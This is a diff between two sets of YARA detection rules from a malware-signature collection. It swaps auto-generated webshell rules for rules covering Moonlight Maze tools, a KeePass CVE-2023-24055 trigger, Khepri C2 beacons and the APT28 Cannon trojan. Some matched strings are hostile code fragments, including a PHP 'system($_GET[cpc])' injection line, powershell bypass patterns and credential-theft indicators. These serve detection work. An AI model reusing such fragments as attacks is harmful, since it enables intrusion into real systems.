+		hash8 = "9a5097d0e8dc29a2814adac070c80fd4b149b33e56aaaf9235af9e87b0501d91"
+		hash9 = "9efb5932c0753e45504fc9e8444209b92c2bdf22e63b1c1a44e2d52cb62b4548"
+		hash10 = "d40b16307d6434c3281374c0e1bbc0f6db388883e7f6266c3c81de0694266882"
 
 	strings:
-		$s0 = "please enter the password:"
-		$s3 = "\\dllTest.pdb"
+		$s1 = ".StartInfo.FileName = 'cmd.exe';" ascii fullword
+		$s2 = "<xsl:template match=\"\"/root\"\">" ascii fullword
+		$s3 = "<?xml version=\"\"1.0\"\"?><root>test</root>\";" ascii fullword
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x253c and filesize < 6KB and all of them
 }
-rule SIGNATURE_BASE_Peek_A_Boo
+rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_Customlokitools : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file peek-a-boo.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f6ca33b5-e37f-5124-a193-a3056c559314"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8560-L8576"
+		description = "Rule to detect Moonlight Maze Loki samples by custom attacker-authored strings"
+		author = "Kaspersky Lab"
+		id = "d5795d3b-bbb1-59e9-b86d-666b5c911f3b"
+		date = "2017-03-15"
+		modified = "2017-03-22"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_moonlightmaze.yar#L11-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "aca339f60d41fdcba83773be5d646776"
-		logic_hash = "b103c1b873dd0df9626d72a1127fbadc821777a05012a080423263a2083c398b"
+		hash = "14cce7e641d308c3a177a8abb5457019"
+		hash = "a3164d2bbc45fb1eef5fde7eb8b245ea"
+		hash = "dabee9a7ea0ddaf900ef1e3e166ffe8a"
+		hash = "1980958afffb6a9d5a6c73fc1e2795c2"
+		hash = "e59f92aadb6505f29a9f368ab803082e"
+		logic_hash = "4e1f60b045c10758354f110c3778b8ffd7f10b5e229b3f2f821287476620bec9"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		version = "1.1"
 
 	strings:
-		$s0 = "__vbaHresultCheckObj"
-		$s1 = "\\VB\\VB5.OLB"
-		$s2 = "capGetDriverDescriptionA"
-		$s3 = "__vbaExceptHandler"
-		$s4 = "EVENT_SINK_Release"
-		$s8 = "__vbaErrorOverflow"
+		$a1 = "Write file Ok..." ascii wide
+		$a2 = "ERROR: Can not open socket...." ascii wide
+		$a3 = "Error in parametrs:" ascii wide
+		$a4 = "Usage: @<get/put> <IP> <PORT> <file>" ascii wide
+		$a5 = "ERROR: Not connect..." ascii wide
+		$a6 = "Connect successful...." ascii wide
+		$a7 = "clnt <%d> rqstd n ll kll" ascii wide
+		$a8 = "clnt <%d> rqstd swap" ascii wide
+		$a9 = "cld nt sgnl prcs grp" ascii wide
+		$a10 = "cld nt sgnl prnt" ascii wide
+		$a11 = "ork error" ascii fullword
 
 	condition:
-		all of them
+		filesize < 5000KB and 3 of ( $a* )
 }
-rule SIGNATURE_BASE_Fmlibraryv3
+rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_Customsniffer
 {
 	meta:
-		description = "Webshells Auto-generated - file fmlibraryv3.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9b8ef79d-80bb-5a05-91e6-0f2bc3fd3068"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8577-L8588"
+		description = "Rule to detect Moonlight Maze sniffer tools"
+		author = "Kaspersky Lab"
+		id = "8cc76e4d-a956-543c-81e0-827dfdb5da1c"
+		date = "2017-03-15"
+		modified = "2023-12-05"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_moonlightmaze.yar#L50-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c34c248fed6d5a20d8203924a2088acc"
-		logic_hash = "a7dc83db26cdda757f626c42022c17bb2764074a3cc5f87b4a3aaa991fac5dc2"
+		hash = "7b86f40e861705d59f5206c482e1f2a5"
+		hash = "927426b558888ad680829bd34b0ad0e7"
+		logic_hash = "5ccf9035adc16393db4b3d461f7a20f86f538275d7806280a15508c15d9c805c"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.1"
+		original_filename = "ora;tdn"
 
 	strings:
-		$s3 = "ExeNewRs.CommandText = \"UPDATE \" & tablename & \" SET \" & ExeNewRsValues & \" WHER"
+		$a1 = "/var/tmp/gogo" fullword
+		$a2 = "myfilename= |%s|" fullword
+		$a3 = "mypid,mygid=" fullword
+		$a4 = "mypid=|%d| mygid=|%d|" fullword
+		$a5 = "/var/tmp/task" fullword
+		$a6 = "mydevname= |%s|" fullword
 
 	condition:
-		all of them
+		2 of ( $a* )
 }
-rule SIGNATURE_BASE_Debug_Dlltest_2
+rule SIGNATURE_BASE_Loki2Crypto
 {
 	meta:
-		description = "Webshells Auto-generated - file dllTest.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cf81e3de-513c-584d-bc37-6504e91b170c"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8589-L8601"
+		description = "Rule to detect hardcoded DH modulus used in 1996/1997 Loki2 sourcecode; #ifdef STRONG_CRYPTO /* 384-bit strong prime */"
+		author = "Costin Raiu, Kaspersky Lab"
+		id = "d67288f8-5205-5882-8dff-041d092eea4f"
+		date = "2017-03-21"
+		modified = "2023-12-05"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_moonlightmaze.yar#L82-L106"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1b9e518aaa62b15079ff6edb412b21e9"
-		logic_hash = "bf260ce0f8d4728920679573cd77927b44db28ba6102923707af8d1ad7d0ef2d"
-		score = 50
+		hash = "19fbd8cbfb12482e8020a887d6427315"
+		hash = "ea06b213d5924de65407e8931b1e4326"
+		hash = "14ecd5e6fc8e501037b54ca263896a11"
+		hash = "e079ec947d3d4dacb21e993b760a65dc"
+		hash = "edf900cebb70c6d1fcab0234062bfc28"
+		logic_hash = "c2315dafb0ecb9e6babd526a028835f3513218c1e667c81088c49ad13dbab5be"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.0"
 
 	strings:
-		$s4 = "\\Debug\\dllTest.pdb"
-		$s5 = "--list the services in the computer"
+		$modulus = {DA E1 01 CD D8 C9 70 AF C2 E4 F2 7A 41 8B 43 39 52 9B 4B 4D E5 85 F8 49}
 
 	condition:
-		all of them
+		( any of them )
 }
-rule SIGNATURE_BASE_Connector
+rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_De_Tool
 {
 	meta:
-		description = "Webshells Auto-generated - file connector.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e46026bc-c570-5057-a132-5a459c959a69"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8602-L8614"
+		description = "Rule to detect Moonlight Maze 'de' and 'deg' tunnel tool"
+		author = "Kaspersky Lab"
+		id = "09bfebca-7cec-5514-9f48-c0c2c57efcf9"
+		date = "2017-03-27"
+		modified = "2017-03-27"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_moonlightmaze.yar#L111-L137"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3ba1827fca7be37c8296cd60be9dc884"
-		logic_hash = "b8cadb7aa23a8cdef10e7b1eb05586d6c3e7c398958a80861b6f1ccd4edf1eca"
+		hash = "4bc7ed168fb78f0dc688ee2be20c9703"
+		hash = "8b56e8552a74133da4bc5939b5f74243"
+		logic_hash = "f658e1aa2ddb84fe3c1de7c7c00f2148d232cf2b3381c298420abfc382c02986"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.0"
 
 	strings:
-		$s2 = "If ( AttackID = BROADCAST_ATTACK )"
-		$s4 = "Add UNIQUE ID for victims / zombies"
+		$a1 = "Vnuk: %d" ascii fullword
+		$a2 = "Syn: %d" ascii fullword
+		$a3 = {25 73 0A 25 73 0A 25 73 0A 25 73 0A}
 
 	condition:
-		all of them
+		(( 2 of ( $a* ) ) )
 }
-rule SIGNATURE_BASE_Shelltools_G0T_Root_Hiderun
+rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_Cle_Tool
 {
 	meta:
-		description = "Webshells Auto-generated - file HideRun.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "dd71dbef-5b5d-5976-8b95-0f202a4b4795"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8615-L8627"
+		description = "Rule to detect Moonlight Maze 'cle' log cleaning tool"
+		author = "Kaspersky Lab"
+		id = "99ae07b9-eb42-53dc-bd8b-75ab6a0b8cab"
+		date = "2017-03-27"
+		modified = "2017-03-27"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_moonlightmaze.yar#L140-L167"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "45436d9bfd8ff94b71eeaeb280025afe"
-		logic_hash = "3a6dea2314800b28e92b59595c8b79c64e66dc66ebfa8f89c2f4028b574b9a91"
+		hash = "647d7b711f7b4434145ea30d0ef207b0"
+		logic_hash = "a4bbd7be617b944a656fa58ca9ec6384f624c95250de6b8a6ba63e7c3387484c"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.0"
 
 	strings:
-		$s0 = "Usage -- hiderun [AppName]"
-		$s7 = "PVAX SW, Alexey A. Popoff, Moscow, 1997."
+		$a1 = "./a filename template_file" ascii wide
+		$a2 = "May be %s is empty?" ascii wide
+		$a3 = "template string = |%s|" ascii wide
+		$a4 = "No blocks !!!"
+		$a5 = "No data in this block !!!!!!" ascii wide
+		$a6 = "No good line"
 
 	condition:
-		all of them
+		(( 3 of ( $a* ) ) )
 }
-rule SIGNATURE_BASE_PHP_Shell_V1_7
+rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_Xk_Keylogger
 {
 	meta:
-		description = "Webshells Auto-generated - file PHP_Shell_v1.7.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7eb69ac3-90bb-5a44-8dcd-e71f5edcf18f"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8628-L8639"
+		description = "Rule to detect Moonlight Maze 'xk' keylogger"
+		author = "Kaspersky Lab"
+		id = "cf585cd0-afdd-5782-a6e5-bb9509cbf01d"
+		date = "2017-03-27"
+		modified = "2017-03-27"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_moonlightmaze.yar#L170-L202"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b5978501c7112584532b4ca6fb77cba5"
-		logic_hash = "e03904177309de9ce1afa0b12bf70913b106650c3db5807f9d4ccb91fb2ade77"
+		logic_hash = "b2acdef9c8e545f4ab217f529a7e4a3e74723b27ec89896f98639fd40792bcc8"
 		score = 75
-		quality = 85
+		quality = 35
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.0"
 
 	strings:
-		$s8 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]"
+		$a1 = "Log ended at => %s"
+		$a2 = "Log started at => %s [pid %d]"
+		$a3 = "/var/tmp/task" fullword
+		$a4 = "/var/tmp/taskhost" fullword
+		$a5 = "my hostname: %s"
+		$a6 = "/var/tmp/tasklog"
+		$a7 = "/var/tmp/.Xtmp01" fullword
+		$a8 = "myfilename=-%s-"
+		$a9 = "/var/tmp/taskpid"
+		$a10 = "mypid=-%d-" fullword
+		$a11 = "/var/tmp/taskgid" fullword
+		$a12 = "mygid=-%d-" fullword
 
 	condition:
-		all of them
+		(( 3 of ( $a* ) ) )
 }
-rule SIGNATURE_BASE_Xssshell_Save
+rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_Encrypted_Keylog : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file save.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f33c7559-e2f7-5223-a0e9-4e1d3bc7f080"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8640-L8652"
+		description = "Rule to detect Moonlight Maze encrypted keylogger logs"
+		author = "Kaspersky Lab"
+		id = "f0d464f0-3955-5f41-a57f-8aa225e1171d"
+		date = "2017-03-27"
+		modified = "2017-03-27"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_moonlightmaze.yar#L204-L222"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "865da1b3974e940936fe38e8e1964980"
-		logic_hash = "c53034c6ebc4f01c4573e688f548e71dae944913797b12eb8f22a5ef0a368ccf"
+		logic_hash = "593f6f2148ddb52e2beee72a48135cd83f126edfdb263b471432d17273e536db"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		version = "1.0"
 
 	strings:
-		$s4 = "RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID"
-		$s5 = "VictimID = fm_NStr(Victims(i))"
+		$a1 = {47 01 22 2A 6D 3E 39 2C}
 
 	condition:
-		all of them
+		uint32( 0 ) == 0x2a220147 and ( $a1 at 0 )
 }
-rule SIGNATURE_BASE_Screencap
+rule SIGNATURE_BASE_Fidelis_Advisory_Purchase_Order_Pps
 {
 	meta:
-		description = "Webshells Auto-generated - file screencap.exe"
+		description = "Detects a string found in a malicious document named Purchase_Order.pps"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0c1b71d3-ad54-5230-b1ab-971647e76139"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8653-L8666"
+		id = "205c4cda-6874-5455-8eb9-b63fb09b13fd"
+		date = "2015-06-09"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/ZjJyti"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fidelis_phishing_plain_sight.yar#L2-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "51139091dea7a9418a50f2712ea72aa6"
-		logic_hash = "9be7ec97ef8e9b8838f7931a8fcf8d85b1543a202a7bf34fab9791fc47889cb9"
+		logic_hash = "45cfee6413accff36a39ced861a29c611d6efe24e1ca87f17467106f8565642b"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "GetDIBColorTable"
-		$s1 = "Screen.bmp"
-		$s2 = "CreateDCA"
+		$s0 = "Users\\Gozie\\Desktop\\Purchase-Order.gif" ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_FSO_S_Phpinj_2
+rule SIGNATURE_BASE_Fidelis_Advisory_Cedt370
 {
 	meta:
-		description = "Webshells Auto-generated - file phpinj.php"
+		description = "Detects a string found in memory of malware cedt370r(3).exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "db8f835e-eb13-50f3-a60b-7d8ffcaa5eaa"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8667-L8678"
+		id = "b5ebf2d7-e3e4-5b3b-a082-417da9c7fda6"
+		date = "2015-06-09"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/ZjJyti"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fidelis_phishing_plain_sight.yar#L16-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "dd39d17e9baca0363cc1c3664e608929"
-		logic_hash = "12af5182b94f01ac4fbdee92c007556aaa7f196aca116575803cedd84b81f3b0"
+		logic_hash = "1070d3c63a7091c0982e67134f9dc3cd790bb0b5c2ac08f3a00e3b97ef53d64b"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s9 = "<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO"
+		$s0 = "PO.exe" ascii fullword
+		$s1 = "Important.exe" ascii fullword
+		$s2 = "&username=" ascii fullword
+		$s3 = "Browsers.txt" ascii fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Zxshell2_0_Rar_Folder_Zxrecv
+rule SIGNATURE_BASE_EXPL_Keepass_CVE_2023_24055_Jan23 : CVE_2023_24055 FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file zxrecv.exe"
+		description = "Detects suspicious entries in the Keepass configuration file, which could be indicator of the exploitation of CVE-2023-24055"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9d36541f-dd55-5385-8e2b-598ad78bdf73"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8679-L8696"
+		id = "2c031919-da19-5fd0-b21a-2e83679ad1e3"
+		date = "2023-01-25"
+		modified = "2023-12-05"
+		reference = "https://github.com/alt3kx/CVE-2023-24055_PoC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_keepass_cve_2023_24055.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5d3d12a39f41d51341ef4cb7ce69d30f"
-		logic_hash = "7eef63e45f6902e4f2d5f854b2794df3101a2ef145e2d627263db429c2b728d7"
+		logic_hash = "3ca00f317838819bb7fb80c9d00d94db498e1d3ef146b9af2664dae09302a86d"
 		score = 75
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 81
+		tags = "CVE-2023-24055, FILE"
 
 	strings:
-		$s0 = "RyFlushBuff"
-		$s1 = "teToWideChar^FiYP"
-		$s2 = "mdesc+8F D"
-		$s3 = "\\von76std"
-		$s4 = "5pur+virtul"
-		$s5 = "- Kablto io"
-		$s6 = "ac#f{lowi8a"
+		$a1 = "<TriggerCollection xmlns:xsi=" ascii wide
+		$x1 = "<Parameter>KeePass XML (2.x)</Parameter>"
+		$x2 = "::ReadAllBytes("
+		$x3 = " -Method "
+		$x4 = " bypass "
+		$x5 = "powershell" nocase ascii wide fullword
 
 	condition:
-		all of them
+		filesize < 200KB and $a1 and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_FSO_S_Ajan
+rule SIGNATURE_BASE_SUSP_Keepass_CVE_2023_24055_Jan23 : CVE_2023_24055 FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file ajan.asp"
+		description = "Detects suspicious triggers defined in the Keepass configuration file, which could be indicator of the exploitation of CVE-2023-24055"
 		author = "Florian Roth (Nextron Systems)"
-		id = "03bf98b9-c8c5-5b9f-b0cd-700c5ed58eac"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8697-L8708"
+		id = "4ff1a93f-f7f0-528d-9e07-402e321a0ffe"
+		date = "2023-01-25"
+		modified = "2023-12-05"
+		reference = "https://github.com/alt3kx/CVE-2023-24055_PoC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_keepass_cve_2023_24055.yar#L22-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "22194f8c44524f80254e1b5aec67b03e"
-		logic_hash = "a7766caae5845ce43cff2212c25fea9a78979d10c79d8c40290b5c1471b101cd"
-		score = 75
+		logic_hash = "4ed3eee86baf3dddfe423795491a5a94c02df3f4a7525efa6f2436e19197e55b"
+		score = 60
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2023-24055, FILE"
 
 	strings:
-		$s4 = "entrika.write \"BinaryStream.SaveToFile"
+		$a1 = "<TriggerCollection xmlns:xsi=" ascii wide
+		$s1 = "<Action>" ascii wide
+		$s2 = "<Parameter>" ascii wide
 
 	condition:
-		all of them
+		filesize < 200KB and $a1 and all of ( $s* )
 }
-rule SIGNATURE_BASE_C99Shell
+rule SIGNATURE_BASE_HKTL_Khepri_Beacon_Sep21_1 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file c99shell.php"
+		description = "Detects Khepri C2 framework beacons"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8709-L8720"
+		id = "b2c8aaf7-7953-55a3-8499-565800fa01f1"
+		date = "2021-09-08"
+		modified = "2023-12-05"
+		reference = "https://github.com/geemion/Khepri/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_khepri.yar#L2-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "90b86a9c63e2cd346fe07cea23fbfc56"
-		logic_hash = "a0fcc43a80ac4d059aea36da8b4b5a81c99a54f7c66c521697805ae890d66fe8"
-		score = 75
+		logic_hash = "c688dbda6006ef28305285f6aeec24a23cbfe9174d09cf4e3586bd0cf7290e60"
+		score = 90
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "86c48679db5f4c085fd741ebec5235bc6cf0cdf8ef2d98fd8a689ceb5088f431"
 
 	strings:
-		$s0 = "<br />Input&nbsp;URL:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&"
+		$x1 = "NT %d.%d Build %d  ProductType:%s" ascii fullword
+		$xe1 = "YzIuQ01EUEFSQU0uY21k" ascii
+		$xe2 = "MyLkNNRFBBUkFNLmNtZ" ascii
+		$xe3 = "jMi5DTURQQVJBTS5jbW" ascii
+		$sx1 = "c2.ProcessItem.user" ascii fullword
+		$sx2 = "c2.CMDPARAM.cmd" ascii fullword
+		$sx3 = "c2.DownLoadFile.file_path" ascii fullword
+		$sa1 = "file size zero"
+		$sa2 = "cmd.exe /c "
+		$sa3 = "error parse param"
+		$sa4 = "innet_ip"
+		$op1 = { c3 b9 b4 98 49 00 87 01 5d c3 b8 b8 98 49 00 c3 8b ff }
+		$op2 = { 8b f1 80 3d 58 97 49 00 00 0f 85 96 00 00 00 33 c0 40 b9 50 97 49 00 87 01 33 db }
+		$op3 = { 90 d5 0c 43 00 34 0d 43 00 ea 0c 43 00 7e 0d 43 00 b6 0d 43 00 cc }
+		$op4 = { 69 c0 ff 00 00 00 8b 4d c0 23 88 40 7c 49 00 89 4d c0 8b 45 cc 0b 45 c0 89 45 cc 8b 45 d0 }
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d or uint32be( 0 ) == 0x7f454c46 ) and filesize < 2000KB and ( 1 of ( $x* ) or 2 of ( $sx* ) or all of ( $sa* ) or 3 of ( $op* ) ) or ( filesize < 10MB and 1 of ( $xe* ) ) or 5 of them
 }
-rule SIGNATURE_BASE_Phpspy_2005_Full
+rule SIGNATURE_BASE_APT_APT28_Cannon_Trojan_Nov18_1 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file phpspy_2005_full.php"
+		description = "Detects Cannon Trojan used by Sofacy"
 		author = "Florian Roth (Nextron Systems)"
-		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8721-L8732"
+		id = "a60f3e75-8bfe-592e-90d1-321bd86173ac"
+		date = "2018-11-20"
+		modified = "2023-12-05"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_cannon.yar#L2-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d1c69bb152645438440e6c903bac16b2"
-		logic_hash = "8561161726a49374a9bc3389fef593e5d68dc437552e06736a235412183bef45"
+		logic_hash = "de8c7bf80fe6209d00955c375b769a3aca138759335abb11f5086f85a4a9c367"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "61a1f3b4fb4dbd2877c91e81db4b1af8395547eab199bf920e9dd11a1127221e"
 
 	strings:
-		$s7 = "echo \"  <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco"
+		$xc1 = { 46 6F 72 6D 31 00 63 61 6E 6E 6F 6E 00 4D 44 61
+               74 00 41 55 54 48 }
+		$xc2 = { 13 4F 00 53 00 3A 00 20 00 20 00 7B 00 30 00 7D
+               00 0A 00 00 17 53 00 44 00 69 00 72 00 3A 00 20
+               00 20 00 7B 00 30 00 7D 00 0A 00 00 1B 44 00 6F
+               00 6D 00 61 00 69 00 6E 00 3A 00 20 00 20 00 7B
+               00 30 00 7D 00 0A 00 00 15 48 00 6F 00 73 00 74
+               00 3A 00 20 00 7B 00 30 00 7D 00 0A 00 00 21 43
+               00 75 00 72 00 72 00 65 00 6E 00 74 00 55 00 73
+               00 72 00 3A 00 20 00 7B 00 30 00 7D 00 0A 00 00
+               17 54 00 69 00 6D 00 65 00 5A 00 3A 00 20 00 7B
+               00 30 00 7D }
+		$x2 = "\\Desktop\\cannon\\obj\\" ascii
+		$x3 = "C:\\Users\\Public\\Music\\s.txt" fullword wide
+		$s1 = "C:\\Documents and Settings\\All Users\\Documents" fullword wide
+		$s2 = "notEncoded - Value here is never used" fullword wide
+		$s3 = "Windows NT\\CurrentVersion\\Winlogon\"" fullword wide
+		$s4 = "AnswerMessageTraverser`1" fullword ascii
 
 	condition:
-		all of them
